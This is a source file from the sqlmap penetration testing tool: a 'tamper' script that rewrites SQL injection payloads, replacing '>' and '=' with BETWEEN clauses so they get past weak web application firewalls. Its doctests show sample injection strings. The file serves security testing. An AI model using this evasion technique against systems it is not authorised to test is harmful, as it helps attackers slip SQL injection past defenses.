1
#!/usr/bin/env python
2

3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7

8
import re
9

10
from lib.core.enums import PRIORITY
11

12
__priority__ = PRIORITY.HIGHEST
13

14
def dependencies():
15
    pass
16

17
def tamper(payload, **kwargs):
18
    """
19
    Replaces the greater-than operator (>) with NOT BETWEEN 0 AND # and the equal sign (=) with BETWEEN # AND #
20

21
    Tested against:
22
        * Microsoft SQL Server 2005
23
        * MySQL 4, 5.0 and 5.5
24
        * Oracle 10g
25
        * PostgreSQL 8.3, 8.4, 9.0
26

27
    Notes:
28
        * Useful to bypass weak and bespoke web application firewalls that
29
          filter the greater than character
30
        * The BETWEEN clause is SQL standard. Hence, this tamper script
31
          should work against all (?) databases
32

33
    >>> tamper('1 AND A > B--')
34
    '1 AND A NOT BETWEEN 0 AND B--'
35
    >>> tamper('1 AND A = B--')
36
    '1 AND A BETWEEN B AND B--'
37
    >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
38
    '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
39
    """
40

41
    retVal = payload
42

43
    if payload:
44
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload)
45

46
        if match:
47
            _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5))
48
            retVal = retVal.replace(match.group(0), _)
49
        else:
50
            retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload)
51

52
        if retVal == payload:
53
            match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload)
54

55
            if match:
56
                _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
57
                retVal = retVal.replace(match.group(0), _)
58

59
    return retVal
60

61